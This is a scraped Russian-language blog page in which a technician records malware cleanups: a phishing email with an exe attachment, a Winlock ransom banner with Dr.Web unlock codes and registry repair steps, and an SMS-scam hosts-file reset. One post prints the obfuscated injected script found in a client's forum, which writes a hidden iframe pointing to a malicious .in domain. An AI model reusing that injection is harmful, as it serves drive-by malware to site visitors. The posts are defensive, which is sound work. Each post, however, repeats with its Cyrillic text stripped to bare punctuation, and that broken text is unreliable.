<a href="https://www.liveinternet.ru/users/arengin/post187491829/">Еще один вирус</a><br/>Получил письмо якобы от компании U.S. Chamber of commerce official letter с вот таким содержанием и прикрепленным архивом, в котором находится exe файлик
[QUOTE]Hello,
On the advice of your partners, we are sending you this letter. In the attached file you will find the offer of cooperation and common development of adjacent areas of our business. Thank you for your attention.[/QUOTE]
Удивился, что ни один из топовых антивирусов его не видит как вирус, хотя он таковым является(проверил что он делает в виртуальной среде XP под Ubuntu), опять отправил файлик в Avira
Буду ждать отве... <a href="https://www.liveinternet.ru/users/arengin/post187491829/">Читать далее...</a>
, 04 2011 . 22:50
+
U.S. Chamber of commerce official letter , exe
Hello,
On the advice of your partners, we are sending you this letter. In the attached file you will find the offer of cooperation and common development of adjacent areas of our business. Thank you for your attention.
, , ( XP Ubuntu), Avira
)
<a href="https://www.liveinternet.ru/users/arengin/post180385297/">Что то новенькое или вредоносная ссылка 486def4</a><br/>Итак, сегодня нашел вирусный код на форуме заказчика, замечу что нашли мы его не сразу, поэтому наши поиски были даже в какой то мере интересны, итак на начальном этапе мы имели форум на IPB и доступ к нему через фтп(по защищенным протоколам и firewall с правилами по IP). Так же имелись жалобы со стороны пользователей на появляющиеся сообщения о вирусах.
Проверка несколькими антивирусами показала, что Kaspersky, Avast, и даже NOD32 - видят вредоносные ссылки, в свою очередь к сожалению Avira их не увидела =\\
javascript в файлах с маской *global*.js
[COLOR=firebrick]document.write('... <a href="https://www.liveinternet.ru/users/arengin/post180385297/">Читать далее...</a>
, 16 2011 . 01:16
+
, , , , IPB ( firewall IP). .
, Kaspersky, Avast, NOD32 - , Avira =\\
javascript *global*.js
document.write('<i'+'frame sr'+'c="http://filtrated.in/wu5y3/07.php" width="0" height="0" frameborder="0">'+'</'+'ifram'+'e>');
*.in/topic.php?b=486def4
8 2011
<a href="https://www.liveinternet.ru/users/arengin/post135254392/">Пополнить счет абонента БИЛАЙН № на сумму 400 рублей После оплаты, на выданном терминалом чеке оплаты, Вы найдете код, который необходимо</a><br/>Ну чтож, столкнулся, опять же по работе, с таким вот баннером.
[QUOTE]ВНИМАНИЕ!!!
Ваша операционная система заблокирована за нарушение использования сети интернет.
Обнаружены следующие нарушения: Посещение сайтов порнографического содержания
с элементами детской порнографии, насилия, зоофилии. Хранение видеофайлов
содержащих порновидео с присутствием несовершеннолетних, насилием, зоофилией и т.п.
Данная блокировка предпринята для устранения возможности распространения
данных материалов с Вашего ПК в сети Интернет.
Для того что бы убрать данный вид блокировки вам нужно:
Пополнить... <a href="https://www.liveinternet.ru/users/arengin/post135254392/">Читать далее...</a>
, 19 2010 . 23:00
+
, , , .
!!!
.
:
, , .
, , ..
.
:
89653662764 400
, , ,
,
, ,
.
, .
, -
, .. !!!
Dr.Web Trojan.Winlock.2354 :
!48950345!
#73736640#
:
443309556
$1100668395$
$30293E09&
$20683054%
%10923810%
~2058205~
(30958374)
$73747589$
^77723094^
!48950345!
@34208923@
?10298012?
418116239917720
558194942536937
6355961531994
54347317309880
306553804289
059101159381545
7501961934276
905312504637
30660439901829709
169905035983413
42159127039382
15088969189682
89856085113988
7282561484488
681896525
2393911249933
276123808945
2114725738
35113365484
41570
31482
6813331
238851
61718337
757311
1296613
179452282
11724208
15339665
31990424
31106493
21311570
516999
17875334
22900800
11451906
92716667
53724259
3237870
9209342
7719090a
11106023
82387662
7719090
312470
21886388
77363000
62152745
97874521
44215407
42400127
54549817
43817218
14118095
68128579
31182772
ixceBnPA
64482142
43136272
11599020
+9999999
5000499544
403956320
xxHDNjGN
CIWLXyso
mXQHRAJN
rerxSOFk
CImmgmew
NBokoQty
heABfoIJ
wwVWgWIH
flKkzZwo
whUOdsCG
DUcUySOq
ZcCySwzr
XboTlVFb
svNJKcHY
MDUyyYTi
mggyVijJ
sxkgbtBX
OsjPoHWa
MPOKeEdi
OcJFxXhE
imnUBdrM
YtluQdge
qCtryJVM
YglWFrVO
04957625564
555666777333
8013328883
965832471
:
. 25 . BIOS.
:
, :
1. "F8".
2. Windows, " "
:
1. , "" , .
-
1. LiveCD - , LiveCD ( - ,
Dr.Web' )
2. LiveCD
BIOS CD-ROM
(
)
3. LiveCD - .
4. HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> Winlogon
5. Shell ( explorer.exe, , . - "explorer.exe" )
6. .
7. " ".
8. .
9. 2 , . .
10. .
- , .
<a href="https://www.liveinternet.ru/users/arengin/post133440174/">Для разблокировки аккаунта Вам необходимо отправить SMS с текстом на номер 6681 - одноклассники, вконтакте, майл и т.д</a><br/>Давно задумывал все таки описывать некоторые моменты своей деятельности... нет нет, я не делаю эти вирусы, трояны, баннеры - я их отключаю. Я привык и отношусь к ним очень спокойно.
Буду записывать способы устранения определенных вирусов и возможные способы устранения.
ВНИМАНИЕ!
НИ КОГДА НЕ ОТПРАВЛЯЙТЕ СМС НА КОРОТКИЙ НОМЕР ПО ПРОСЬБЕ ТАКИХ БАННЕРОВ!
ЕСЛИ ВАС ПРОСЯТ ЗАПЛАТИТЬ НА ТАКОЙ ТО НОМЕР И НА ЧЕКЕ БУДЕТ КОД АКТИВАЦИИ - ЭТО ЛОХОТРОН!
АНТИВИРУСЫ НЕ ПРОСЯТ ОТПРАВИТЬ СМС НА КАКОЙ ЛИБО НОМЕР!
ОДНОКЛАССНИКИ И ВКОНТАКТЕ НИ КОГДА НЕ ЗАСТАВЛЯЮТ ОТПРАВИТЬ СМС!
ЛЮБЫЕ БАННЕРЫ ПОПАВШИЕ НА КО... <a href="https://www.liveinternet.ru/users/arengin/post133440174/">Читать далее...</a>
, 27 2010 . 10:47
+
... , , , - . .
.
!
!
- !
!
!
!
, !
300 !
...
- " , , - ..."
, . .
:
" SMS 6681"
"" Windows XP .
1. C:\WINDOWS\system32\drivers\etc
2. hosts
3. Ctrl+A ( ) Del (Delete)
4. :
# (C) (Microsoft Corp.), 1993-1999
#
# HOSTS, Microsoft TCP/IP Windows.
#
# IP- .
# . IP-
# , .
# IP- .
#
# ,
# (, ),
# '#'.
#
# :
#
# 102.54.94.97 rhino.acme.com #
# 38.25.63.10 x.acme.com # x
127.0.0.1 localhost
5. , - .
6. - , . .
7. .
- ,